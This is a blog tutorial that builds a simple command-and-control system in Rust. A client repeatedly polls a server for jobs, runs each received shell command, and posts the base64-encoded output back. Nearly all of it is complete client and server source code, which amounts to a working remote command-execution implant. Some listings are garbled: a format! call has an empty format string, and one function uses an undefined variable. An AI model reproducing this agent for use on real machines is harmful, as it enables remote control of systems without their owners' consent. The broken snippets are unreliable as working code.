From Hello World API to Simple Command and Control Server
In a previous blog I wrote about learning a new language by creating a “Hello World” API server. In this blog, I plan to take that a step further and turn that Rust API into the start of a Command-and-Control server.
Initial Setup
To generate the initial directory structure the command cargo init callback will create the starting directory where project will be built. Once created, src/main.rs can be removed since this project will be using a src/client.rs and a src/server.rs file instead. A Makefile will also be created within the main directory so compiling the code can be done using make and the project folder can be cleaned up using make clean. This also opens up the option in the future to implement cross-compiling as a build option using make if desired. That should give us the directory structure below.
Directory Structure:
callback ├── Cargo.toml ├── Makefile └── src └── server.rs └── client.rs
|
With the directory structure created from the cargo command, the next step is to update the Cargo.toml with the dependencies and declarations for compiling the Rust source code into two separate binaries.
Cargo.toml
[package] name = "callback" version = "0.1.0" edition = "2021"
[dependencies] clap = { version = "4.5.4", features = ["derive"] } actix-web = "4" serde = { version = "1.0", features = ["derive"] }
[[bin]] name = "server" path = "src/server.rs"
[[bin]] name = "client" path = "src/client.rs"
|
The next update will add some commands into the Makefile so that we can use make build and make clean in order to build the project and clean up the directory to its original form prior to a build.
Makefile
build: cargo build --release
clean: cargo clean rm Cargo.lock
all: build
|
The final change is to add code to both the server and client files to give us a starting point using a Hello World API. Once compiled, that will generate a server binary to start up the API server and a client binary to make requests to that server.
server.rs
use clap::Parser; use actix_web::{get, post, App, HttpServer, web,middleware::Logger, Responder, Result}; use serde::Serialize; use serde::Deserialize; use env_logger::Env;
#[derive(Parser, Debug)] #[command(arg_required_else_help(true))] struct Args { #[clap(short, long)] port: u16, }
#[derive(Serialize)] struct MyObj { name: String, }
#[derive(Deserialize)] struct Info { name: String, }
#[get("/{name}")] async fn index(name: web::Path<String>) -> Result<impl Responder> { let obj = MyObj { name: name.to_string(), }; Ok(web::Json(obj)) }
#[post("/hello")] async fn echo(info: web::Json<Info>) -> Result<String> { Ok(format!("Welcome {}!", info.name)) }
#[actix_web::main] async fn main() -> std::io::Result<()> { // imports arguments let args = Args::parse();
env_logger::init_from_env(Env::default() .default_filter_or("info")); HttpServer::new(|| App::new() .service(index) .service(echo) .wrap(Logger::default())) .bind(("127.0.0.1", args.port))? .run() .await }
|
client.rs
use clap::Parser; use reqwest::Error;
#[derive(Parser, Debug)] #[command(arg_required_else_help(true))] struct Args { #[clap(short, long)] method: String,
#[clap(short, long)] url: String }
async fn get_request(url: String) -> Result<(), Error> { let response = reqwest::get(url+"/rust").await?; println!("Status: {}", response.status());
let body = response.text().await?; println!("Body:\n{}", body);
Ok(()) }
async fn post_request(url: String) -> Result<(), Error> { let client = reqwest::Client::new();
let response = client .post(url+"/hello") .header("Content-Type","application/json") .body(r#"{"name":"test-post"}"#) .send() .await?;
println!("Status: {}", response.status());
let body = response.text().await?; println!("Body:\n{}", body);
Ok(()) }
#[tokio::main] async fn main() -> Result<(), Error> { let args = Args::parse(); if args.method == "get" { get_request(args.url).await?; } else if args.method == "post" { post_request(args.url).await?; }
Ok(()) }
|
Setting up the client to phone home
The first modification that we need to make will be to modify the client to continuously callback to the server at set intervals. For simplicity, we will just have it invoke the hello world API and pass a URL parameter. In this case, we will reuse the GET request to /rust and have it repeat in 10 second intervals using sleep. Documentation around sleep can be found below and the code the delay was based on can also be found:
https://doc.rust-lang.org/std/thread/fn.sleep.html
For the delay, I added in the following two functions: first so that we can create a general delay, and an async version so that we can sleep a thread.
// function to set a custom delay fn delay(seconds: u64) { let ten_seconds = time::Duration::from_secs(seconds); let now = time::Instant::now();
thread::sleep(ten_seconds);
assert!(now.elapsed() >= ten_seconds); }
// function to set a custom delay within a thread fn async_delay(seconds: u64) { let ten_seconds = time::Duration::from_secs(seconds); let now = time::Instant::now();
thread::sleep(ten_seconds);
assert!(now.elapsed() >= ten_second); }
|
Since I am only planning to test the one GET, I also updated main to create an infinite loop using the loop keyword in Rust to targeting localhost on port 8080. Due to the variable living outside of the loop, the url variable will also need to be cloned for the string to be passed into the function.
#[tokio::main] async fn main() -> Result<(), Error> { let url = String::from("http://localhost:8080"); loop { get_request(url.clone()).await?; async_delay(10); } }
|
Along with adding in the updates above to the main function I also will be reducing the code from the initial client to just the minimum parts needed.
client.rs
use reqwest::Error; use std::{thread, time};
async fn get_request(url: String) -> Result<(), Error> { let response = reqwest::get(url.clone()+"/rust").await?; println!("Status: {}", response.status());
let body = response.text().await?; println!("Body:\n{}", body);
Ok(()) }
async fn post_request(url: String) -> Result<(), Error> { let client = reqwest::Client::new();
let response = client .post(url.clone()+"/hello") .header("Content-Type","application/json") .body(r#"{"name":"test-post"}"#) .send() .await?;
println!("Status: {}", response.status());
let body = response.text().await?; println!("Body:\n{}", body);
Ok(()) }
// function to set a custom delay fn delay(seconds: u64) { let ten_seconds = time::Duration::from_secs(seconds); let now = time::Instant::now();
thread::sleep(ten_seconds);
assert!(now.elapsed() >= ten_seconds); }
// function to set a custom delay within a thread fn async_delay(seconds: u64) { let ten_seconds = time::Duration::from_secs(seconds); let now = time::Instant::now();
thread::sleep(ten_seconds);
assert!(now.elapsed() >= ten_seconds); }
#[tokio::main] async fn main() -> Result<(), Error> { let url = String::from("http://127.0.0.1:8080"); loop { get_request(url.clone()).await?; async_delay(10); } }
|
After rebuilding the code using make, this should result in command line output for the server that looks like the below output when the client is executed and the server is receiving a request every 10 seconds. Something to note is that although the code is set to callback every 10 seconds, you may see a 1-2 second delay added as it executes API requests in later updates to the code or when testing code that may take a little while to process. This will show up more and more as we add code to the loop for testing.
$ ./server -p 8080 [2024-09-04T02:00:43Z INFO actix_server::builder] starting 8 workers [2024-09-04T02:00:43Z INFO actix_server::server] Actix runtime found; starting in Actix runtime [2024-09-04T02:01:14Z INFO actix_web::middleware::logger] 127.0.0.1 "GET /rust HTTP/1.1" 200 15 "-" "-" 0.000082 [2024-09-04T02:01:24Z INFO actix_web::middleware::logger] 127.0.0.1 "GET /rust HTTP/1.1" 200 15 "-" "-" 0.000098 [2024-09-04T02:01:34Z INFO actix_web::middleware::logger] 127.0.0.1 "GET /rust HTTP/1.1" 200 15 "-" "-" 0.000101
|
Adding in Command Execution
Now that the delay is working, the next step is to add in command execution. For that I will be using the Command structure along with a few status checks:
// executes shell commands for windows or mac/linux fn cmdexec(cmd: &str) -> String { let results = if cfg!(target_os = "windows") { Command::new("cmd") .args(["/C", cmd]) .output() .expect("failed to execute process") } else { Command::new("sh") .arg("-c") .arg(cmd) .output() .expect("failed to execute process") };
// checks the status of the executed command println!("status: {} \n", results.status);
// print the output of the command let output = String::from_utf8_lossy(&results.stdout).into_owned(); println!("output: \n{}",output); return output; }
|
Status codes vary depending on the command executed, but one constant between both Windows and Linux is that a status of 0 usually means the command executed successfully. For those that want to dig deeper, the following two links have a good starting point in understanding potential status codes.
Linux: https://itsfoss.com/linux-exit-codes/
Windows: https://learn.microsoft.com/en-us/windows/win32/debug/system-error-codes
We will also modify main again to run a single command echo test:
#[tokio::main] async fn main() -> Result<(), Error> { let url = String::from("http://localhost:8080"); loop { get_request(url.clone()).await?; cmdexec("echo test"); async_delay(10); } }
|
Below is the new updated code for client.rs:
client.rs
use reqwest::Error; use std::{thread, time}; use std::process::Command;
async fn get_request(url: String) -> Result<(), Error> { let response = reqwest::get(url.clone()+"/rust").await?; println!("Status: {}", response.status());
let body = response.text().await?; println!("Body:\n{}", body);
Ok(()) }
async fn post_request(url: String) -> Result<(), Error> { let client = reqwest::Client::new();
let response = client .post(url+"/hello") .header("Content-Type","application/json") .body(r#"{"name":"test-post"}"#) .send() .await?;
println!("Status: {}", response.status());
let body = response.text().await?; println!("Body:\n{}", body);
Ok(()) }
// function to set a custom delay fn delay(seconds: u64) { let ten_seconds = time::Duration::from_secs(seconds); let now = time::Instant::now();
thread::sleep(ten_seconds);
assert!(now.elapsed() >= ten_seconds); }
// function to set a custom delay within a thread fn async_delay(seconds: u64) { let ten_seconds = time::Duration::from_secs(seconds); let now = time::Instant::now();
thread::sleep(ten_seconds);
assert!(now.elapsed() >= ten_seconds); }
// executes shell commands for windows or mac/linux fn cmdexec(cmd: &str) -> String { let results = if cfg!(target_os = "windows") { Command::new("cmd") .args(["/C", cmd]) .output() .expect("failed to execute process") } else { Command::new("sh") .arg("-c") .arg(cmd) .output() .expect("failed to execute process") }; // checks the status of the command println!("status: {} \n", results.status);
// prints the output from the command let output = String::from_utf8_lossy(&results.stdout).into_owned(); println!("output: \n{}",output); return output; }
#[tokio::main] async fn main() -> Result<(), Error> { let url = String::from("http://localhost:8080"); loop { get_request(url.clone()).await?; cmdexec("echo test"); async_delay(10); } }
|
After recompiling and executing the client, it continues to send delayed requests followed by our command executing. Our command has a status of 0 on Linux showing a successful execution.
Status: 200 OK Body: {"name":"rust"} status: exit status: 0
output: test
|
With a successful command execution, the next step is to update the API server to receive the results of those commands. To do that, modify the post_request function within client.rs to the following:
async fn post_request(url: String) -> Result<(), Error> { let client = reqwest::Client::new();
let response = client .post(url+"/hello") .header("Content-Type","application/json") .body(r#"{"name":"test-post"}"#) .send() .await?;
println!("Status: {}", response.status());
let body = response.text().await?; println!("Body:\n{}", body);
Ok(()) }
|
The following change was also made to the server.rs file so that we can print out the sent data:
#[post("/hello")] async fn echo(info: web::Json<Info>) -> Result<String> { println!("output: \n{}",info.name); Ok(format!("Welcome {}!", info.name)) }
|
After recompiling and executing our code, this should result in a client response as follows:
$ ./client Status: 200 OK Body: Welcome test-post! status: exit status: 127
output:
|
On the server we should see the following output showing the test-post string as output:
$ ./server -p 8080 [2024-09-04T03:18:25Z INFO actix_server::builder] starting 8 workers [2024-09-04T03:18:25Z INFO actix_server::server] Actix runtime found; starting in Actix runtime output: test-post
|
With the output now being printed back to our server we can continue to modify our code to receive the outputs of our commands. Since the cmdexec function returns command output as a string, we will modify it further to return that output using the base64 crate to ensure the integrity of the command output being sent back to the web server.
For those jumping into this blog and are unfamiliar with Rust, crates are same as libraries you can import in order to add functionality into your projects. This will require a couple updates. One of these is adding base64 = "0.22.1" to the dependencies section of Cargo.toml. Additionally, since base64 encoding will be used with both the client and the server the following import will be added to the top of both client.rs and server.rs.
With the use declaration added to both the client and server, the client cmdexec function will be modified to base64 the command output before sending it back as part of the existing post request. Later on, we will be sending the error code and the base64 output to the web server. To accomplish this, I modified the function to return two string values. The new cmdexec should now look like this and return two results:
// executes shell commands for windows or mac/linux fn cmdexec(cmd: &str) -> (String, String) { let results = if cfg!(target_os = "windows") { Command::new("cmd") .args(["/C", cmd]) .output() .expect("failed to execute process") } else { Command::new("sh") .arg("-c") .arg(cmd) .output() .expect("failed to execute process") };
// checks the status of the command let exec_code = results.status;
// prints the output from the command let results = String::from_utf8_lossy(&results.stdout).into_owned(); // base64 encodes the command output let output = BASE64_STANDARD.encode(results.as_bytes()); //println!("output: \n{}",output); return (output, exec_code.to_string()); }
|
To verify this worked as expected I then modified the main function to print out these values:
#[tokio::main] async fn main() -> Result<(), Error> { let url = String::from("http://localhost:8080"); loop { post_request(url.clone()).await?; let (data,status) = cmdexec("echo test"); println!("status: {}\noutput: {}",status,data); async_delay(10); } }
|
After another recompile, this resulted in both the status and the command output being printed client side:
$ ./client Status: 200 OK Body: Welcome test-post! status: exit status: 0 output: dGVzdAo=
|
All that is left now is to modify both post_request within client.rs to send our data to the server and then modify server.rs to process and output those results. I started with the server by modifying the Info structure to the following:
#[derive(Deserialize)] struct Info { status: String, data: String, }
|
I then modified the post request to return no data and to print out the results, as well as to base64 decode the results sent from the server.
#[post("/hello")] async fn echo(info: web::Json<Info>) -> Result<String> { println!("status: {}\noutput:\n{}",info.status, info.data); Ok(("Ok").to_string()) }
|
Within client.rs I ended up adding the following changes to post_request. To make it easier to read I created the post body as a separate variable in case I needed to troubleshoot the formatting. This came in handy because I could verify that the JSON body was formatted correctly.
async fn post_request(url: String,status_code: String, b64_data: String) -> Result<(), Error> { let client = reqwest::Client::new();
// build post body let post_data = format!("",status_code, b64_data); // send post request to server let response = client .post(url+"/hello") .header("Content-Type","application/json") .body(post_data) .send() .await?;
println!("Status: {}", response.status());
let body = response.text().await?; println!("Body:\n{}", body);
Ok(()) }
|
I also had to re-organize main so that the variables needed for the post request are created prior to sending the post body to the server.
#[tokio::main] async fn main() -> Result<(), Error> { let url = String::from("http://localhost:8080"); loop { let (data,status) = cmdexec("echo test"); post_request(url.clone(),status,data).await?; async_delay(10); } }
|
Now that the commands are being encoded and sent to the server, that leaves the task of processing the base64 and displaying the outputs by modifying the echo function which is handling the pre-existing hello world API.
#[post("/hello")] async fn echo(info: web::Json<Info>) -> Result<String> { // decodes the base64 results let bytes = BASE64_STANDARD.decode(info.data.as_bytes()).unwrap(); let output = str::from_utf8(&bytes).unwrap(); // prints the output and returns the works OK back to the client println!("status: {}\noutput:\n{}",info.status, output); Ok(("Ok").to_string()) }
|
Another change that I made was also to swap out the echo test command with a command that would return multiple lines, in this case nslookup google.com 8.8.8.8. After recompiling and executing both the client and the server, we should now see the following output from our web server:
[2024-09-04T13:06:06Z INFO actix_web::middleware::logger] 127.0.0.1 "POST /hello HTTP/1.1" 200 2 "-" "-" 0.000060 status: exit status: 0 output: Server: 8.8.8.8base64 Address: 8.8.8.8#53
Non-authoritative answer: Name: google.com Address: 142.250.190.142 Name: google.com Address: 2607:f8b0:4009:81a::200e
|
Feeding in custom commands
Now that the application is returning back the output of commands executed on the web server, the next step is to set up a few additional APIs to send custom commands. To do this, first a new structure will need to be created to send and receive those commands:
#[derive(Serialize,Deserialize)] struct Jobs { job: String, }
|
The next step is to create the new API calls to send and receive those instructions through a jobs API call but before that a struct will need to be created to hold the commands we send to the server; we’ll call this Tasks. Since this object will be mutable I also added in an additional use declaration for std::sync::Mutex so that we can create a mutable string for the commands that will be submitted to the web server.
use std::sync::Mutex;
struct Tasks { pub task: Mutex<String>, }
|
A declaration for that struct will also be added to main so that it can be added as app_data to the Actix web server as shown in the code below, along with two new services check_job and set_job which will be used when creating the job API calls:
// initializes the Tasks structure let jobs = web::Data::new(Tasks { task: Mutex::new("None".to_string()) }); // sets up the actix server HttpServer::new(move || App::new() .app_data(jobs.clone()) .service(check_job) .service(set_job) .service(echo) .wrap(Logger::default())) .bind(("127.0.0.1", args.port))? .run() .await
|
With all the declarations set up that leaves us with the task of creating a new GET request with the path /job. The new Tasks object will need to be referenced in the function declaration so that we can start viewing and modifying the values. In the below image the function was set up to return the value set within the Tasks object using the Jobs structure created previously. Additionally, since in this case I will be using GET requests to retrieve those commands, I also set this to set the value back to None once a command is requested. This will help when verifying if the client is working as intended but will also lock it down to just a single client for now.
// get command #[get("/job")] async fn check_job(data: web::Data<Tasks>) -> Result<impl Responder> { // creates json object for the job let job = Jobs { job: data.task.lock().unwrap().to_string(), };
// resets job back to None let mut new_job = data.task.lock().unwrap(); *new_job = "None".to_string();
Ok(web::Json(job)) }
|
For the POST request portion, I made a very similar function to set the new command as a job within the structure.
// set command #[post("/job")] async fn set_job(jobs: web::Json<Jobs>, data: web::Data<Tasks>) -> Result<String> { // prints the output and returns the works OK back to the client println!("job: {}",jobs.job); // resets job back to None let mut new_job = data.task.lock().unwrap(); *new_job = jobs.job.to_string(); Ok(("Ok").to_string()) }
|
After cleaning up the code this leaves a server.rs file that looks like this:
server.rs
use clap::Parser; use actix_web::{get, post, App, HttpServer, web,middleware::Logger, Responder, Result}; use serde::{Serialize,Deserialize}; use std::sync::Mutex; use env_logger::Env; use base64::prelude::*; use std::str;
#[derive(Parser, Debug)] #[command(arg_required_else_help(true))] struct Args { #[clap(short, long)] port: u16, }
#[derive(Deserialize)] struct Info { status: String, data: String, }
#[derive(Serialize,Deserialize)] struct Jobs { job: String, }
struct Tasks { pub task: Mutex<String>, }
#[post("/hello")] async fn echo(info: web::Json<Info>) -> Result<String> { // decodes the base64 results let bytes = BASE64_STANDARD.decode(info.data.as_bytes()).unwrap(); let output = str::from_utf8(&bytes).unwrap(); // prints the output and returns the works OK back to the client println!("status: {}\noutput:\n{}",info.status, output); Ok(("Ok").to_string()) }
// get command #[get("/job")] async fn check_job(data: web::Data<Tasks>) -> Result<impl Responder> { // creates json object for the job let job = Jobs { job: data.task.lock().unwrap().to_string(), };
// resets job back to None let mut new_job = data.task.lock().unwrap(); *new_job = "None".to_string();
Ok(web::Json(job)) }
// set command #[post("/job")] async fn set_job(jobs: web::Json<Jobs>, data: web::Data<Tasks>) -> Result<String> { // prints the output and returns the works OK back to the client println!("job: {}",jobs.job); // resets job back to None let mut new_job = data.task.lock().unwrap(); *new_job = jobs.job.to_string(); Ok(("Ok").to_string()) }
#[actix_web::main] async fn main() -> std::io::Result<()> { // imports arguments let args = Args::parse();
// sets up logging env_logger::init_from_env(Env::default() .default_filter_or("info")); // initializes the Tasks structure let jobs = web::Data::new(Tasks { task: Mutex::new("None".to_string()) }); // sets up the actix server HttpServer::new(move || App::new() .app_data(jobs.clone()) .service(check_job) .service(set_job) .service(echo) .wrap(Logger::default())) .bind(("127.0.0.1", args.port))? .run() .await }
|
The final step is to set the client to read the command, execute it and return the results to the server. First, we will update the get_request function to pull in a command and process it. This will take a few changes to the code since the code will also need to be written to accept a JSON body. I based the new function after the example on the reqwest documentation page here:
https://docs.rs/reqwest/latest/reqwest/struct.Response.html#method.json
The above example resulted in code that looked like this, replacing the current get_request.
use serde::Deserialize;
#[derive(Deserialize)] struct Jobs { job: String, }
async fn get_request(url: String) -> Result<(), Error> { let response = reqwest::get(url+"/job") .await? .json::<Jobs>() .await?; println!("Body:\n{}", response.job); Ok(()) }
|
At this point, let’s make sure the code is working as intended. To do that I ran the command below to populate the server with a command before running the client again.
curl -X POST -H "content-type: application/json" --data '{"job":"nslookup google.com 8.8.8.8"}' 127.0.0.1:8080/job
|
After running the client, it should now show the command sent along with the None after the command is reset:
Body: nslookup google.com 8.8.8.8 Body: None
|
With the code outputting the correct values we can add in the next request to process the command. For that I took the code I removed from the while loop for the post request and added it back into the get_request function giving us the following code in the get_request function, along with some logic to do nothing if the value is set to None. This is also where we will be using the general delay function. The delay function allows the loop to continue to query the API and only sleep in the thread before sending the command back to the server.
async fn get_request(url: String) -> Result<(), Error> { let response = reqwest::get(url.clone()+"/job") .await? .json::<Jobs>() .await?;
// delay before sending and executing the code delay(5); // checking if value is None before executing if response.job.as_str() != "None" { let (data,status) = cmdexec(response.job.as_str()); post_request(url,status,data).await?; }
Ok(()) }
|
The client.rs should now look like the following. I also removed the extra print statements from the post_request function now that the code is working as expected.
client.rs
use reqwest::Error; use serde::Deserialize; use std::{thread, time}; use std::process::Command; use base64::prelude::*;
#[derive(Deserialize)] struct Jobs { job: String, }
async fn get_request(url: String) -> Result<(), Error> { let response = reqwest::get(url.clone()+"/job") .await? .json::<Jobs>() .await?;
// delay before sending and executing the code delay(5);
// checking if value is None before executing if response.job.as_str() != "None" { let (data,status) = cmdexec(response.job.as_str()); post_request(url,status,data).await?; }
Ok(()) }
async fn post_request(url: String,status_code: String, b64_data: String) -> Result<(), Error> { let client = reqwest::Client::new();
// build post body let post_data = format!("",status_code, b64_data); // send post request to server client.post(url+"/hello") .header("Content-Type","application/json") .body(post_data) .send() .await?;
Ok(()) }
// function to set a custom delay fn delay(seconds: u64) { let ten_seconds = time::Duration::from_secs(seconds); let now = time::Instant::now();
thread::sleep(ten_seconds);
assert!(now.elapsed() >= ten_seconds); }
// function to set a custom delay within a thread fn async_delay(seconds: u64) { let ten_seconds = time::Duration::from_secs(seconds); let now = time::Instant::now();
thread::sleep(ten_seconds);
assert!(now.elapsed() >= ten_seconds); }
// executes shell commands for windows or mac/linux fn cmdexec(cmd: &str) -> (String, String) { let results = if cfg!(target_os = "windows") { Command::new("cmd") .args(["/C", cmd]) .output() .expect("failed to execute process") } else { Command::new("sh") .arg("-c") .arg(cmd) .output() .expect("failed to execute process") };
// checks the status of the command let exec_code = results.status;
// prints the output from the command let results = String::from_utf8_lossy(&results.stdout).into_owned(); // base64 encodes the command output let output = BASE64_STANDARD.encode(results.as_bytes()); //println!("output: \n{}",output); return (output, exec_code.to_string()); }
#[tokio::main] async fn main() -> Result<(), Error> { let url = String::from("http://localhost:8080"); loop { get_request(url.clone()).await?; delay(10); } }
|
Assuming the command was sent with the curl request mentioned above, we should now see output on the server receiving the command and outputting the response from the command executed:
[2024-09-16T03:24:49Z INFO actix_web::middleware::logger] 127.0.0.1 "GET /job HTTP/1.1" 200 14 "-" "-" 0.000029 job: nslookup google.com 8.8.8.8 [2024-09-16T03:25:04Z INFO actix_web::middleware::logger] 127.0.0.1 "POST /job HTTP/1.1" 200 2 "-" "curl/8.9.1" 0.000079 [2024-09-16T03:25:04Z INFO actix_web::middleware::logger] 127.0.0.1 "GET /job HTTP/1.1" 200 37 "-" "-" 0.000029 status: exit status: 0 output: Server: 8.8.8.8 Address: 8.8.8.8#53
Non-authoritative answer: Name: google.com Address: 142.250.191.238 Name: google.com Address: 2607:f8b0:4009:801::200e
|
Final Thoughts
Overall, I found it was a fun experience turning a Hello World API into a means of passing commands to client application and good practice learning how things are done in Rust. This project went through how to execute commands, error codes to validate potential issues with commands executed, and how to store data in Actix to reference data across multiple threads using app_data. There is still a lot left to do with this project before this code is ready to be used outside of a test environment, but it is a starting point to go further. For now, I will save that for a future blog post. Have fun coding out there!